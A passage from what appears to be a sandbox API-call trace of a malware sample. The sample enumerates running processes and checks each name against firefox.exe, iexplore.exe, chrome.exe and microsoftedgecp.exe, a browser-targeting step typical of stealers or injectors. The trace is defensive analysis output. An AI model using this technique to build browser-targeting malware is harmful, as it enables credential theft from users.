th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0218.586] lstrcmpiA (lpString1="audiodg.exe", lpString2="firefox.exe") returned -1 [0218.586] lstrcmpiA (lpString1="audiodg.exe", lpString2="iexplore.exe") returned -1 [0218.586] lstrcmpiA (lpString1="audiodg.exe", lpString2="chrome.exe") returned -1 [0218.586] lstrcmpiA (lpString1="audiodg.exe", lpString2="microsoftedgecp.exe") returned -1 [0218.586] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0218.587] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0218.587] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0218.587] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0218.587] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0218.587] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0218.587] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0218.587] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0218.587] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0218.587] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0218.587] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0218.588] lstrcmpiA (lpString1="dwm.exe", lpString2="firefox.exe") returned -1 [0218.588] lstrcmpiA (lpString1="dwm.exe", lpString2="iexplore.exe") returned -1 [0218.588] lstrcmpiA (lpString1="dwm.exe", lpString2="chrome.exe") returned 1 [0218.588] lstrcmpiA (lpString1="dwm.exe", lpString2="microsoftedgecp.exe") returned -1 [0218.588] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0218.588] lstrcmpiA (lpString1="spoolsv.exe", lpString2="firefox.exe") returned 1 [0218.588] lstrcmpiA (lpString1="spoolsv.exe", lpString2="iexplore.exe") returned 1 [0218.589] lstrcmpiA (lpString1="spoolsv.exe", lpString2="chrome.exe") returned 1 [0218.589] lstrcmpiA (lpString1="spoolsv.exe", lpString2="microsoftedgecp.exe") returned 1 [0218.589] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0218.589] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0218.589] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0218.589] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0218.589] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0218.589] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0218.590] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0218.590] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0218.590] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0218.590] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0218.590] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0218.590] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0218.590] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0218.590] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0218.590] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0218.590] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0218.591] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="firefox.exe") returned -1 [0218.591] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="iexplore.exe") returned -1 [0218.591] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="chrome.exe") returned -1 [0218.591] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="microsoftedgecp.exe") returned -1 [0218.591] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0218.591] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="firefox.exe") returned -1 [0218.591] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="iexplore.exe") returned -1 [0218.591] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="chrome.exe") returned -1 [0218.591] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="microsoftedgecp.exe") returned -1 [0218.591] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0218.592] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="firefox.exe") returned 1 [0218.592] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="iexplore.exe") returned 1 [0218.592] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="chrome.exe") returned 1 [0218.592] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="microsoftedgecp.exe") returned 1 [0218.592] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0218.592] lstrcmpiA (lpString1="definitely.exe", lpString2="firefox.exe") returned -1 [0218.592] lstrcmpiA (lpString1="definitely.exe", lpString2="iexplore.exe") returned -1 [0218.593] lstrcmpiA (lpString1="definitely.exe", lpString2="chrome.exe") returned 1 [0218.593] lstrcmpiA (lpString1="definitely.exe", lpString2="microsoftedgecp.exe") returned -1 [0218.593] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0218.593] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="firefox.exe") returned 1 [0218.593] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="iexplore.exe") returned 1 [0218.593] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="chrome.exe") returned 1 [0218.593] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="microsoftedgecp.exe") returned -1 [0218.593] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0218.594] lstrcmpiA (lpString1="whenever.exe", lpString2="firefox.exe") returned 1 [0218.594] lstrcmpiA (lpString1="whenever.exe", lpString2="iexplore.exe") returned 1 [0218.594] lstrcmpiA (lpString1="whenever.exe", lpString2="chrome.exe") returned 1 [0218.594] lstrcmpiA (lpString1="whenever.exe", lpString2="microsoftedgecp.exe") returned 1 [0218.594] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0218.594] lstrcmpiA (lpString1="potentially.exe", lpString2="firefox.exe") returned 1 [0218.594] lstrcmpiA (lpString1="potentially.exe", lpString2="iexplore.exe") returned 1 [0218.594] lstrcmpiA (lpString1="potentially.exe", lpString2="chrome.exe") returned 1 [0218.594] lstrcmpiA (lpString1="potentially.exe", lpString2="microsoftedgecp.exe") returned 1 [0218.594] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0218.595] lstrcmpiA (lpString1="seeker.exe", lpString2="firefox.exe") returned 1 [0218.595] lstrcmpiA (lpString1="seeker.exe", lpString2="iexplore.exe") returned 1 [0218.595] lstrcmpiA (lpString1="seeker.exe", lpString2="chrome.exe") returned 1 [0218.595] lstrcmpiA (lpString1="seeker.exe", lpString2="microsoftedgecp.exe") returned 1 [0218.595] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0218.595] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="firefox.exe") returned 1 [0218.595] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="iexplore.exe") returned 1 [0218.595] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="chrome.exe") returned 1 [0218.595] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="microsoftedgecp.exe") returned 1 [0218.595] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0218.596] lstrcmpiA (lpString1="birth bean.exe", lpString2="firefox.exe") returned -1 [0218.596] lstrcmpiA (lpString1="birth bean.exe", lpString2="iexplore.exe") returned -1 [0218.596] lstrcmpiA (lpString1="birth bean.exe", lpString2="chrome.exe") returned -1 [0218.596] lstrcmpiA (lpString1="birth bean.exe", lpString2="microsoftedgecp.exe") returned -1 [0218.596] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0218.596] lstrcmpiA (lpString1="ruby.exe", lpString2="firefox.exe") returned 1 [0218.597] lstrcmpiA (lpString1="ruby.exe", lpString2="iexplore.exe") returned 1 [0218.597] lstrcmpiA (lpString1="ruby.exe", lpString2="chrome.exe") returned 1 [0218.597] lstrcmpiA (lpString1="ruby.exe", lpString2="microsoftedgecp.exe") returned 1 [0218.597] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0218.597] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="firefox.exe") returned 1 [0218.597] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="iexplore.exe") returned 1 [0218.597] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="chrome.exe") returned 1 [0218.597] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="microsoftedgecp.exe") returned 1 [0218.597] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0218.598] lstrcmpiA (lpString1="smith.exe", lpString2="firefox.exe") returned 1 [0218.598] lstrcmpiA (lpString1="smith.exe", lpString2="iexplore.exe") returned 1 [0218.598] lstrcmpiA (lpString1="smith.exe", lpString2="chrome.exe") returned 1 [0218.598] lstrcmpiA (lpString1="smith.exe", lpString2="microsoftedgecp.exe") returned 1 [0218.598] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0218.598] lstrcmpiA (lpString1="spicedespite.exe", lpString2="firefox.exe") returned 1 [0218.598] lstrcmpiA (lpString1="spicedespite.exe", lpString2="iexplore.exe") returned 1 [0218.598] lstrcmpiA (lpString1="spicedespite.exe", lpString2="chrome.exe") returned 1 [0218.598] lstrcmpiA (lpString1="spicedespite.exe", lpString2="microsoftedgecp.exe") returned 1 [0218.598] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0218.599] lstrcmpiA (lpString1="wooden.exe", lpString2="firefox.exe") returned 1 [0218.599] lstrcmpiA (lpString1="wooden.exe", lpString2="iexplore.exe") returned 1 [0218.599] lstrcmpiA (lpString1="wooden.exe", lpString2="chrome.exe") returned 1 [0218.599] lstrcmpiA (lpString1="wooden.exe", lpString2="microsoftedgecp.exe") returned 1 [0218.599] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0218.599] lstrcmpiA (lpString1="dallasr.exe", lpString2="firefox.exe") returned -1 [0218.599] lstrcmpiA (lpString1="dallasr.exe", lpString2="iexplore.exe") returned -1 [0218.599] lstrcmpiA (lpString1="dallasr.exe", lpString2="chrome.exe") returned 1 [0218.599] lstrcmpiA (lpString1="dallasr.exe", lpString2="microsoftedgecp.exe") returned -1 [0218.599] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0218.600] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="firefox.exe") returned -1 [0218.600] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="iexplore.exe") returned -1 [0218.600] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="chrome.exe") returned -1 [0218.600] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="microsoftedgecp.exe") returned -1 [0218.600] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0218.601] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="firefox.exe") returned -1 [0218.601] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="iexplore.exe") returned -1 [0218.601] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="chrome.exe") returned 1 [0218.601] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="microsoftedgecp.exe") returned -1 [0218.601] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0218.601] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="firefox.exe") returned 1 [0218.601] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="iexplore.exe") returned 1 [0218.601] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="chrome.exe") returned 1 [0218.601] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="microsoftedgecp.exe") returned 1 [0218.601] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0218.602] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="firefox.exe") returned -1 [0218.602] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="iexplore.exe") returned -1 [0218.602] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="chrome.exe") returned 1 [0218.602] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="microsoftedgecp.exe") returned -1 [0218.602] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0218.602] lstrcmpiA (lpString1="population openings.exe", lpString2="firefox.exe") returned 1 [0218.602] lstrcmpiA (lpString1="population openings.exe", lpString2="iexplore.exe") returned 1 [0218.602] lstrcmpiA (lpString1="population openings.exe", lpString2="chrome.exe") returned 1 [0218.602] lstrcmpiA (lpString1="population openings.exe", lpString2="microsoftedgecp.exe") returned 1 [0218.602] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0218.603] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0218.603] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0218.603] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0218.603] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0218.603] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0218.603] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0218.603] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0218.603] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0218.603] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0218.603] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0218.604] lstrcmpiA (lpString1="sppsvc.exe", lpString2="firefox.exe") returned 1 [0218.604] lstrcmpiA (lpString1="sppsvc.exe", lpString2="iexplore.exe") returned 1 [0218.604] lstrcmpiA (lpString1="sppsvc.exe", lpString2="chrome.exe") returned 1 [0218.604] lstrcmpiA (lpString1="sppsvc.exe", lpString2="microsoftedgecp.exe") returned 1 [0218.604] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0218.605] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0218.605] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0218.605] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0218.605] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0218.605] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0218.605] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0218.605] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0218.605] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0218.605] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0218.605] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0218.606] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0218.606] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0218.606] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0218.606] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0218.606] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0218.606] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0218.606] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0218.606] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0218.606] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0218.606] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0218.607] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0218.607] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0218.607] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0218.607] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0218.607] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0218.607] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0218.607] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0218.607] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0218.607] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0218.607] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0218.608] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0218.608] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0218.608] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0218.608] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0218.608] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0218.609] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0218.609] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0218.609] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0218.609] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0218.609] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0218.609] lstrcmpiA (lpString1="explorer.exe", 